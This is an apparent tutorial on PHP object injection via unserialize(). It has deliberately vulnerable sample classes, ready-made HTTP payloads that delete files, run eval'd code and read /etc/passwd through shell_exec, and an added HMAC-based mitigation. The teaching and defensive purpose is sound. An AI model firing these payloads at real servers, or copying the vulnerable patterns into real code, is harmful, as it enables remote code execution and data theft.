The PHP unserialize exploit is a kind of PHP Object Injection. It occurs when user-controlled input is passed to the unserialize() function without being validated first.
For this exploit to work, you need to take advantage of PHP's magic methods such as __destruct() or __wakeup().
See examples below:
For example, say you have this class named Sample1 with a __destruct method in it.
```php
<?php
class Sample1 {
    private $file;

    public function __construct() {
        // SOME PHP CODES HERE
    }

    // Runs automatically when the object is destroyed, including objects
    // that were created by unserialize().
    public function __destruct() {
        $file = '/tmp/' . $this->file;
        if (file_exists($file)) {
            return unlink($file);
        }
    }
}

// SOME PHP CODE HERE

// User-controlled input reaches unserialize() without any validation.
unserialize($_GET['data']);
```
As you can see in the example above, the code unserializes $_GET['data'], which is user-defined input, without any validation. An attacker might be able to delete files using a Path Traversal attack.
All we need to do here is set a malicious string in the data parameter to make this exploit work. See the malicious payload below.
```http
GET /Sample1.php?data=O%3A8%3A%22Sample1%22%3A1%3A%7Bs%3A14%3A%22%00Sample1%00file%22%3Bs%3A8%3A%22test.txt%22%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token
```
This particular payload sets Sample1's $file to test.txt and then triggers the __destruct method, which proceeds to delete test.txt in the /tmp directory.
Now check our second example, which uses the __wakeup magic method.
```php
<?php
class Sample2 {
    private $cmd;

    public function __construct() {
        // SOME PHP CODE
    }

    // Runs automatically right after unserialize() rebuilds the object.
    public function __wakeup() {
        if ($this->cmd) {
            eval($this->cmd);
        }
    }
}

// SOME PHP CODE

// User-controlled input reaches unserialize() without any validation.
unserialize($_GET['data']);
```
In this example, an attacker might be able to execute PHP code by sending a malicious payload. Check the payload below.
```http
GET /Sample2.php?data=O%3A7%3A%22Sample2%22%3A1%3A%7Bs%3A12%3A%22%00Sample2%00cmd%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token
```
This particular payload simply executes phpinfo();. But with a little tweak to our payload, we can do almost anything on their server. Check the sample payload below, which will display the contents of the /etc/passwd file.
```http
GET /Sample2.php?data=O%3A7%3A"Sample2"%3A1%3A%7Bs%3A12%3A"%00Sample2%00cmd"%3Bs%3A36%3A"print+shell_exec%28%27cat+%2Fetc%2Fpasswd%27%29%3B"%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token
```
Basically, with this flaw, the attacker can play GOD Mode on the victim's application. That's how serious this vulnerability is.
This vulnerability is present on PHP 5.3 and higher.
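For comparison, here is an added example (not code from the original post) of how the `data` parameter in both Sample1 and Sample2 could be consumed without letting an attacker-built object reach __destruct() or __wakeup(). It assumes PHP 7.0 or later (for the `allowed_classes` option) and a server-side secret `$secret` that is never sent to clients; the secret value below is a placeholder.

```php
<?php
// Added example, not part of the original post: consuming a "data"
// parameter without letting attacker-built objects reach __wakeup() or
// __destruct(). Assumes PHP >= 7.0 (allowed_classes option) and a
// server-side $secret never sent to clients (placeholder value below).

// Only blobs the server itself produced and signed are ever unserialized.
function sign_blob(string $blob, string $secret): string
{
    return base64_encode($blob) . '.' . hash_hmac('sha256', $blob, $secret);
}

// Returns the decoded value, or null if the token is unsigned, tampered
// with, or contains any object at all.
function load_blob(string $token, string $secret)
{
    $parts = explode('.', $token, 2);
    $blob  = count($parts) === 2 ? base64_decode($parts[0], true) : false;
    if ($blob === false) {
        return null;
    }
    // Constant-time MAC check happens BEFORE unserialize(), so a forged
    // payload like the ones above never reaches the parser at all.
    if (!hash_equals(hash_hmac('sha256', $blob, $secret), $parts[1])) {
        return null;
    }
    // Defence in depth: any object becomes __PHP_Incomplete_Class, whose
    // magic methods do nothing, so gadgets like Sample1/Sample2 cannot run.
    $value = @unserialize($blob, ['allowed_classes' => false]);
    return ($value === false || has_object($value)) ? null : $value;
}

function has_object($value): bool
{
    if (is_object($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (has_object($item)) {
                return true;
            }
        }
    }
    return false;
}

$secret = 'CHANGE-ME-server-side-secret';  // placeholder, keep out of the repo
$token  = sign_blob(serialize(['file' => 'report.txt']), $secret);
var_dump(load_blob($token, $secret));       // round-trip of server-produced data
var_dump(load_blob($token . 'x', $secret)); // tampered token is rejected
```

If the data never needs to be a PHP value at all, json_decode() with an associative-array result is simpler still, since JSON cannot express objects with behaviour.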